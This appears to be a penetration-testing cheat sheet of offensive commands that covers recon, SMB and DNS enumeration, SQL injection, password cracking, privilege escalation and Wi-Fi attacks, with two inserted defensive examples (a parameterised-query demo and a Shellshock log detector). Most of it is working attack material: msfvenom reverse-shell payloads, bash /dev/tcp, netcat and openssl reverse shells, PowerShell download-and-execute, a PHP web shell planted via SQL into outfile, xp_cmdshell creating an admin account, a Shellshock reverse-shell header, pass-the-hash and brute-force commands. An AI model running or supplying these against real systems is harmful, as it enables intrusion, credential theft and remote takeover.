Hacking-Tools-Repository
massExpConsole
routersploit
Sublist3r
airgeddon
DorkMe
hashcat-legacy
metagoofil
scavenger
takeover
aron
droopescan
hashstack-server-plugin-jtr
nemesis
SecLists
TheFatRat
AutoSploit
EagleEye
InSpy
osint-scraper
seeker
Trity
badKarma
Eternalblue-Doublepulsar-Metasploit
Leaked
osrframework
SharpHound
wordlist
Bashark
exploitpack-master
linpostexp
Photon
SiteBroker
wpscan
BloodHound
firesheep
Log-killer
PowerSploit
SocialBox
xerxes
Cl0neMast3r
fuxploider
lscript
pywerview
SocialFish
Cortex-Analyzers
Gopherus
machine_learning_security
ReconDog
sshng2john
DarkSpiritz
hackbox
mail-security-tester
RED_HAWK
stash.sqlite
Goggle Search
Extract ip from host command
Extract domain from index.html
Netdiscover
Nmap explain closed,filtered
Nmap examples
Nmap Scripts
Search for NMAP scripts
Nmap – Options
Nmap – Combos
Portscaning with Netcat
Hping3
Ping and portscan from shell
Gobuster
Dirb
dirb http://10.10.10.1 /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Curl
curl –url “imap://mail.example.com/” –user “bobby:tables”
Upload
curl –upload-file file.txt -v –url <url> -0 –http1.0
Cewl
Find words on webpages that can be used for password crack.
cewl http://www.site.se -m 6 -w /cewl.txt
Can then be passed to John The Ripper
Directory or Path Traversal
192.168.1.1/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd
Null Byte
?page=../../../../../etc/passwd%00
Wpscan
wpscan –u http://10.1.1.1/ –enumerate t –enumerate t –enumerate u
wpscan -u http://10.1.1.1 -e –log tenten_wpscan.txt
wpscan –url <url> Scan cms
wpscan –url <url> –enumerate vp (Scan plugins)
wpscan –url <url> –enumerate ut (scan Themes)
wpscan –url <url> –enumerate u (Enumerate Users)
wpscan –url <url> –wordlist pass.txt threats 50 (BruteForse)
Metagoofil
metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html
Nikto
nıkto -h 10.1.1.1
Drupe scan
./droopescan scan drupal -u http://192.168.2.152
Dns
nslookup
server 10.10.10.100
host -t ns domain.se
host -t mx domain.se
host http://www.domain.se
Zonetransfer
host -t axfr domain.se ns1.domain.se
host -l domain.se 10.1.1.1
zone transfers
host -l server.se ns3.server.se.
Reverse DNS
theharvester -n -d host.se -b all
Dnsenum
dnsenum domain.se
Dnsrecon
dnsrecon -d 10.10.10.100 -r 10.0.0.0/8
Smtp
vrfy
for user in $(cat users.txt); do echo VRFY $user |nc -nv -w 192.168.1.1 25 2>/dev/null | grep ^”250″;done
Python script to vrfy
python
#!/usr/bin/python
import socket
import sys
if len(sys.argv) !=2:
print “Usage: vrfy.py <username>”
sys.exit(0)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((‘127.0.0.1’,25))
print banner
s.send(‘VRFY ‘ + sys.argv[1] + ‘r\n\’
result=s.recv(1024)
print result
s.close()
Smb
Rpcclient
Old
rpcclient -U roger 192.168.1.1
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser roger
Nbtscan
nbtscan -f target
nbtscan -v verbose
Smb enumeration
Enum4linux -a 192.168.1.1
Smb nmap
nmap –script=vuln 192.1681.1 -p445
Smbclient
Look for shares
smbclient -L //10.10.10.100 -U name
smbclient \\\\192.168.1.1\\Share -W DOMAIN -U roger
Smbmap
Locate Shares:
smbmap -H 10.10.10.100
List Files on Share
smbmap -R Replication -H 10.10.10.100
List Files
smbmap -R Replication -H 10.10.10.100 -A Groups.xml -q
smbmap -u username -p ‘HASH:HASH’ -H 192.168.1.1 -R –download path/pathtofile.xt
–download Download file with smbmap
Smbclient
smbclient //10.10.10.100/Replication
recurse ON
prompt OFF
mget *
Smb impacket
/usr/share/doc/python-impacket/examples/GetADUsers.py -all domain.dc/svc_user -dc-ip 10.10.10.1
/usr/share/doc/python-impacket/examples/psexec.py domain.dc/[email protected]
smbmap -d domain.dc -u svc_user -p password -H 10.10.10.1
/usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.1 domain.dc/svc_user
/usr/share/doc/python-impacket/examples/psexec.py domain.dc/[email protected]
-R ‘List file
Password from GPO Policy
less /usr/share/smbmap/10.1.1.1/Replication_domain.dc_Policies_\{31B2F340-016D-11D2-945F-00C0aFB984F9\}_MACHINE_Preferences_Groups_Groups.xml
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJa3mjWA98ga9guKOhaOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
PASSWORDWITH_gpp-decrypt
Windows Tips
Run as command
runas /netonly /user:domain.dc\svc_user cmd
Windows Credentials Editor (WCE)
wce64.exe -w
Sharphound
SharpHound.exe -c all -d domain.dc –domaincontroller 10.10.1.1
Find files Windows
where /R C:\ bash.exe
Getting Access and Maintaining Acccess
Searchsploit
Mirror down
searchsplit -m exploits/php/webapps/18650.py
searchsploit -x exploits/php/webapps/18650.py
searchsploit -p exploits/php/webapps/18650.py
Metasploit
Start databas
service postgresql start
Start Metasploit
msfconsole -q
exit backround session ctrl z or type background
exploit -j
sessions -i
sessions l
setg = global value ex. setg RHOST 192.168.1.1
Metaexploit Steps
mfsconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST ip
SET LPORT port
exploit -j
Access the exploit
shell.aspx
shell
systeminfo
search suggest exploits
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
use exploit/windows/local/ms10_015_kitrap0d
set lhost ip
set lport port
Create Payloads
Msfvenom
Linux
msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.1 LPORT=4444 SHELL=/bin/bash -a cmd –platform Unix -e generic/none
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f elf > shell.elf
Windows
msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.1 lport=8888 –f exe > /root/Desktop/1.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.14.10 LPORT=4444 > r2.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.1 LPORT=444 -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.1 LPORT=444 -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=444 -f raw > shell.pl
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Unicorn
Create Payload
python unicorn.py windows/meterpreter/reverse_http 10.1.1.1 8001
Use exploit and create payload
Exploit:
chmod 755 cve-2017-8759_toolkit.py
Create Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6996 -f exe > /tmp/gotcha.exe
Create rtf file from exploit
python cve-2017-8759_toolkit.py -M gen -w Gotcha.rtf -u http://192.168.1.101/gotcha.txt
Host The Payload on our server
python cve-2017-8759_toolkit.py -M exp -e http://192.168.1.101/gotcha.exe -l /tmp/gotcha.exe
Mini webserver with python
python -m SimpleHTTPServer 80
Filedownload
PowerShell
powershell IEX(new-object net.webclient).downloadstring(‘http://10.1.1.10/empire.ps1‘)”
Linux
wget 192.168.1.1:80/attack.txt
curl 192.168.1.1:80/attack.txt > file.txt
fetch http:// 192.168.1.1:80/attack.txt
Victim > Attacker
nc -lvp 4444 > file.txt
nc 192.168.1.1 4444 < file.txt
Attacker > Victim
Target
nc -nvlp 81 > file.txt
Attacker
nc 192.268.1.1. 82 < file.txt
Netcat
Victim:
nc -lvnp 4444 > incomming.exe
Source:
nc -nv 10.0.2.15 4444 </usr/share/windows-binaries/wget.exe
Windows
Tftp
Server
atftpd -v –port 69 –bind-address 10.10.10.2 –daemon /srv/tftp/
Client
tftp -i 192.168.1.1 GET nc.exe
Ftp
On Windows you can script this with a text file
ftp -s ftp.txt
Ftp 192.168.1.1.1
ls
get nc.exe
put nc.exe
set binary
Reverse Shell
Netcat
Ncat to get support for ssl and rules
Listener
nc -lvnp 4444
Connector
nc -nv 192.168.1.1 25
Netcat Command execution
Victim
nc -lvnp 4444 -e /bin/bash
Source
nc -nv 10.0.2.15 4444
Netcat Windows to get PowerShell shell
nc64.exe 10.1.1.1 9001 -e powershell
Shell from dash or bad shell
Attacker:
nc -nlvp 9001
Victim
bash -c ’bach -i >& /dev/tcp/192.168.1.1/9001 0>&1’
You get shell on Attacker then
python -c ‘import pty; pty.spawn(“/bin/bash”)’
After that
script -q /dev/null
Then backround
ctrl z
Then type
stty raw -echo
Then hit fg for foreground
OpenSSH
Create Cert
openssl req -x509 -newkey
rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Start the Listener on Attacker
openssl s_server -quiet
-key key.pem -cert cert.pem -port 4444
Start reverse shell on victim with openssl
mkfifo /tmp/s; /bin/sh -i <
/tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.1. >
/tmp/s; rm /tmp/s
ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx -o shell.aspx
PHP
Create s.php
/*s.php*/
<?php echo shell_exec($_GET[‘cmd’]);?>
Copy nc.exe and s.php to web folder
http://10.10.10.1/s.php?cmd=nc 10.10.14.10 4444 -e cmd
wget 10.1.1.1:80/php-reverse-shell.txt -P /var/www/admin/
mv /var/www/admin/php-reverse-shell.txt /var/www/admin/php-reverse-shell.php
Nice remote shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
set TERM=linux
No real bash
ctrl z
background
stty raw -echo
fg
Password
Responder
Set up responder to listen to clients and capture hashes
responder
•Default location: “/usr/share/responder/”
•Stores hashes in Responder.db
Captures password hashes you can crack with John The Ripper
Capture LTM hashes from sql injection
Start smb server On Attacker
impacket-smbserver share $(pwd)
Use this on the webpage:
; use master; exec xp_dirtree ‘\\10.1.1.1\share’;–
Unshadow
sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt
HASHCAT
hashcat -h | grep -i ntlm
hashcat -m 3100 haches.txt /opt/share/wordlist/rocky.txt
to launch a combination attack against MD5 password hashes
hashcat -m 0 -a 1 /root/hashes/hashes.txt /root/rockyou.txt
a straight through attack is super fast on simple passwords
hashcat -m 0 -a 0 /root/hashes/hashes.txt /root/rockyou.txt
John The Ripper
john hashes.txt -format=nt -show (CrackNTLM)
use the cewel.txt in john the ripper to
john –wordlist=cvewl.txt –rules –stdout > pass.txt
john –wordlist:/usr/share/wordlists/rockyou.txt
RSA
Now we need to convert the rsa key to john format and save it in a file:
#root@kali: ssh2john rsakey > rsa2johnfile
Now crack the passphrase using any wordlist:
#root@kali: john –wordlist=/usr/share/wordlists/rockyou.txt –format=SSH rsa2johnfile
When it’s done, you can show the password if it has been cracked by issuing the following command:
#root@kali: john –show rsa2johnfile
Passwords dumps Windows
Pwdump and FGdump
crunch Create Passwordlists
crunch 6 6 01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ
Passing The Hash
Passing the hash
pth-*
export SMBHASH=1231234124124124124:1243124124124124124124124
pth-winexe -U administrator% //192.168.1.1 cmd
Medusa
medua -h 192.168.1.1. -u admin -P password.txt -M http -m DIR:/admin -T 20
Ncrack
use for rdp brute force
ncrack -v -f --user administrator -P password.txt rdp://192.168.1.1,CL=1
Hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt -u -s 22 10.1.1.1 ssh
hydra 10.1.1.1 -V -l user -P /usr/share/wordlists/rockyou.txt http-get-form “/login.php:username=^USER^&password=^PASS^&Login=Login:F=The password you entered was not valid.:H=Cookie: PHPSESSID=2tr9o96unnmlrgfom8hbaqhp7l; security=low”
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form “/:password=^PASS^:Invalid password!” -s 54415 -I
MySQL
Connect to local database
mysql -u zabbix -D zabbixdb -p
Sqlmap
Use burpsuite to capture login request
Save login request to login.req
sqlmap -r login.req --level 5
Search for databases
sqlmap -u "http://192.168.1.1/index.php?par=" --dbs
Checking privileges of the users in database
sqlmap -u "192.168.1.124/sqli/Less-1/?id=1" --privileges
Reading a file from the web server
sqlmap -u "192.168.1.124/sqli/Less-1/?id=1" --file-read=/xampp/htdocs/index.php --batch
Dump Username and Password
sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --dump --threads=5
Dump tables
sqlmap -u "http://192.168.1.1/index.php?par=" --dbs -D dbname --tables --dump
sqlmap -u "http://192.168.1.1/index.php?par=" --dbs -D dbname -T tablename --dump
Automated Shell
sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --os-shell
sqlmap -u http://10.1.1.1/login.php --forms --level 5 --risk 3 --string "The password you entered was not valid." --dbs --batch
sqlmap -l trace.txt --dbs (RDBMS enum from a proxy log)
sqlmap -l trace.txt -D <db> --tables (list tables)
sqlmap -l trace.txt -D <db> -T <table> --dump (dump table content)
Crawl links
sqlmap -u http://192.168.1.1 --crawl=1
sqlmap -u http://192.168.1.1 --forms --batch --crawl=5 --cookie="jsessionid=1234" --level=5 --risk=3
In the browser dev console, read the session cookie with document.cookie and pass it to sqlmap:
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value copied from the dev console>" --dbs
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value copied from the dev console>" -D moviescope --tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value copied from the dev console>" -D moviescope -T User_Login --columns
Manual sql injection commands
Check for sqli vulnerability
?id=1'
Find the number of columns
?id=1 order by 9 -- -
Find a column that is reflected in the page
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -
Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -
Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -
Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -
Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name='users' -- -
Get content from the users table, columns name and password (0x3a is a ':' and only serves as a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 from users -- -
Read file
?id=1 union select 1,2,3,4,load_file('/etc/passwd'),6,7,8,9 -- -
?id=1 union select 1,2,3,4,load_file('/var/www/login.php'),6,7,8,9 -- -
Create a file, then read it back to check that it was really created
?id=1 union select 1,2,3,4,'this is a test message',6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4,load_file('/var/www/test'),6,7,8,9 -- -
Create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET["cmd"]); ?>',6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null,load_file('/var/www/shell.php'),6,7,8,9 -- -
Then go to the browser and see if you can execute commands
http://<targetip>/shell.php?cmd=id
Sql injections
User name        | Password        | SQL Query
tom              | tom             | SELECT * FROM users WHERE name='tom' and password='tom'
tom              | ' or '1'='1     | SELECT * FROM users WHERE name='tom' and password='' or '1'='1'
tom              | ' or 1='1       | SELECT * FROM users WHERE name='tom' and password='' or 1='1'
tom              | 1' or 1=1 -- -  | SELECT * FROM users WHERE name='tom' and password='' or 1=1 -- -'
' or '1'='1      | ' or '1'='1     | SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'
' or ' 1=1       | ' or ' 1=1      | SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1'
1' or 1=1 -- -   | blah            | SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah'
Other payloads:
'or 1=1#
' or '1'='1
blah';insert into login values ('john','apple123'); --
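Added example, not part of the cheat sheet: replay the login query from the table above against an in-memory SQLite database to show how each payload rewrites the WHERE clause, and that the same input is harmless once the query is parameterised. The users table and its two rows are constructed sample data.

```python
"""Vulnerable string-built login query beside its parameterised form (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users, one of them 'tom' with password 'tom'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("tom", "tom"), ("alice", "s3cret")])
    return conn


def login_concat(conn: sqlite3.Connection, name: str, password: str) -> int:
    """Vulnerable form: input is spliced into the SQL text exactly as in the
    'SQL Query' column. Returns how many rows match (>0 means login accepted)."""
    sql = f"SELECT * FROM users WHERE name='{name}' and password='{password}'"
    return len(conn.execute(sql).fetchall())


def login_param(conn: sqlite3.Connection, name: str, password: str) -> int:
    """Hardened form: placeholders send the values separately from the SQL text,
    so a quote in the input can never close the string literal."""
    sql = "SELECT * FROM users WHERE name=? and password=?"
    return len(conn.execute(sql, (name, password)).fetchall())


def compare(name: str, password: str) -> tuple:
    """Return (rows matched by the vulnerable query, rows matched by the safe one)."""
    conn = make_db()
    return login_concat(conn, name, password), login_param(conn, name, password)


if __name__ == "__main__":
    # The three rows of the table that SQLite can evaluate ('#' comments are MySQL-only).
    for creds in [("tom", "tom"), ("tom", "' or '1'='1"), ("1' or 1=1 -- -", "blah")]:
        print(creds, "->", compare(*creds))
```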
Command injections
;ls
sqsh – Interactive database shell for Sybase
Login
sqsh -S 127.0.0.1:123 -U sa -P secretpassword
exec xp_cmdshell 'whoami'
go
exec xp_cmdshell 'net user roger pass /add'
go
exec xp_cmdshell 'net localgroup Administrators roger /add'
go
exec xp_cmdshell 'net localgroup "Remote Desktop Users" roger /add'
go
Shellshock with Burpsuite
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.1/8081 0>&1
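Added example, not part of the cheat sheet: a log check that flags requests carrying the Shellshock trigger above. An unpatched bash only mis-parses an environment variable as a function when its value begins with "() {", so that prefix in any client-supplied header (User-Agent, Referer, Cookie) is what to alert on; the access-log lines are constructed samples in a combined-log style with the User-Agent last.

```python
"""Detect Shellshock-style function definitions in web access logs (added example)."""
import re

# Only a header value that *starts* with "() {" reaches bash as a function body.
FUNC_DEF_RE = re.compile(r"^\s*\(\)\s*\{")

# Constructed sample log lines: ip - - "METHOD PATH PROTO" STATUS "USER-AGENT"
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /cgi-bin/status HTTP/1.1" 200 "() { :; }; bash -i >& /dev/tcp/10.10.14.1/8081 0>&1"',
    '10.0.0.6 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.7 - - "GET /cgi-bin/test.sh HTTP/1.1" 500 "() { _; }; /usr/bin/id"',
    '10.0.0.8 - - "GET /about HTTP/1.1" 200 "curl/7.88 () {not a function}"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d+) "(?P<ua>.*)"$')


def find_shellshock(lines):
    """Return (client_ip, path) for every line whose User-Agent begins with the
    bash function-definition prefix; lines that do not parse are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and FUNC_DEF_RE.match(m.group("ua")):
            hits.append((m.group("ip"), m.group("path")))
    return hits


if __name__ == "__main__":
    for ip, path in find_shellshock(SAMPLE_LOG):
        print(f"shellshock attempt from {ip} against {path}")
```

The match only proves an attempt, not success; on a patched bash the value is imported as a plain variable, so pair the hit with the target path (CGI endpoints) and the response status when triaging.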
Snmp
snmpwalk 10.1.1.1 -c public -v 2c
onesixtyone
HEX to TXT and Back
xxd -ps fil.txt > fil.txt.hex
vi fil.txt.hex
xxd -r -ps fil.txt.hex > fil.txt
Stego and Strings
steghide --extract -sf ./Granted.jpg
binwalk -e
java -jar Stegsolve.jar
strings ./HackerAccessGranted.jpg
Stego Links
https://www.dcode.fr/caesar-cipher
https://www.splitbrain.org/_static/ook/
https://incoherency.co.uk/image-steganography/#unhide
Magic Numbers
hex to bin
xxd -r hashdump.txt hex.bz2
Links
https://en.wikipedia.org/wiki/List_of_file_signatures
Base64 encode decode
base64 filename.exe > file.txt
base64 -d file.txt > filename.exe
Base64 command and execute
echo ls /home | base64
bHMgL2hvbWUK
echo bHMgL2hvbWUK | base64 -d | bash
ProxyChains
Coming soon
Chisel
TCP tunnel over HTTP
https://github.com/jpillora/chisel.git
Attacker
chisel server -p 8000 --reverse -v
Client (Victim)
chisel client 172.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Windows Privilege Escalation
systeminfo
hostname
echo %username%
net users
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
Sysinternals
accesschk.exe
net start
net stop
Registry Checks for Passwords
reg query HKLM /f password /t REG_SZ /s > pass.txt
reg query HKCU /f password /t REG_SZ /s >> pass.txt
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini
Find writable files
dir /a-r-d /s /b
Empire Setup
git clone https://github.com/EmpireProject/Empire.git -b dev
cd Empire
cd setup
./setup.sh
PowerShell
Invoke-AllChecks
Linux Privilege Escalation
The things I have used from this page are:
# Sticky bit - only the owner of the directory or the owner of a file can delete or rename inside it.
find / -perm -1000 -type d 2>/dev/null
# SGID (chmod 2000) - runs as the group, not the user who started it.
find / -perm -g=s -type f 2>/dev/null
# SUID (chmod 4000) - runs as the owner, not the user who started it.
find / -perm -u=s -type f 2>/dev/null
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null # SGID or SUID (the parentheses make -type f apply to both)
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (quicker search)
# find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
LinEnum
./LinEnum.sh -t > kali.txt
Commands
cat /etc/issue
cat /etc/lsb-release
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ps aux | grep root
crontab -l
Port forward
ssh -L 8080:127.0.0.1:80 user@<remote-host>
ssh -R 8080:127.0.0.1:80 user@<remote-host>
Binary Exploitation
Tools
OllyDbg
Immunity Debugger
gdb
Binary Ninja
Stacks
Buffers
Fuzzing
Registers
EAX
ECX
EDX
EBX
ESP
EBP
ESI
EDI
EIP - controls the path of code execution
Debug Applications
r2
aaa (analyse all)
afl (list functions)
pdf @ main (disassemble main)
pdc @ main (decompile main as C-like pseudocode)
ldd: list the shared libraries an application links against
ldd /usr/
Ruby pattern create tool
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
Ruby: find the offset of the pattern bytes that ended up in EIP
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb
Ruby: assemble an instruction to get its opcodes, e.g. to search for a JMP ESP
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP
Shrink Go Binaries
go build -ldflags="-s -w"
and
upx --brute chisel
Tcp dump icmp packets
tcpdump -i eth0 icmp -n
Covering Tracks
Metasploit
Linux tips and tricks
Updatedb
Update database for mlocate
updatedb
Count characters
echo -n asjdflkjalskdjflkjasdfljldkf | wc -c
md5sum
echo -n 'asjdflkjalskdjflkjasdfljldkf' | md5sum
Run a command immune to hangups
nohup
Wireless
### Check Config
iwconfig
### Enable Monitoring
airmon-ng start wlan0
iwconfig
### Looking for AP
airodump-ng wlan0mon
### Looking for Clients
airodump-ng --bssid <ap> --channel <ap channel> wlan0mon
### Start Recording
airodump-ng --bssid <ap> --channel <ap channel> --showack -w wpa_log wlan0mon
### Deauth
aireplay-ng -0 20 -a <ap> -c <client> wlan0mon
### Crack
aircrack-ng wpa_log-01.cap -w /usr/share/wordlists/rockyou.txt
Links
Exploits
https://www.exploit-db.com/google-hacking-database
John The Ripper
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c
Linux Priv Escalation
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Github tools
0d1n
Door404
Hacking-Tools-Repository
massExpConsole
routersploit
Sublist3r
airgeddon
DorkMe
hashcat-legacy
metagoofil
scavenger
takeover
aron
droopescan
hashstack-server-plugin-jtr
nemesis
SecLists
TheFatRat
AutoSploit
EagleEye
InSpy
osint-scraper
seeker
Trity
badKarma
Eternalblue-Doublepulsar-Metasploit
Leaked
osrframework
SharpHound
wordlist
Bashark
exploitpack-master
linpostexp
Photon
SiteBroker
wpscan
BloodHound
firesheep
Log-killer
PowerSploit
SocialBox
xerxes
Cl0neMast3r
fuxploider
lscript
pywerview
SocialFish
Cortex-Analyzers
Gopherus
machine_learning_security
ReconDog
sshng2john
DarkSpiritz
hackbox
mail-security-tester
RED_HAWK
stash.sqlite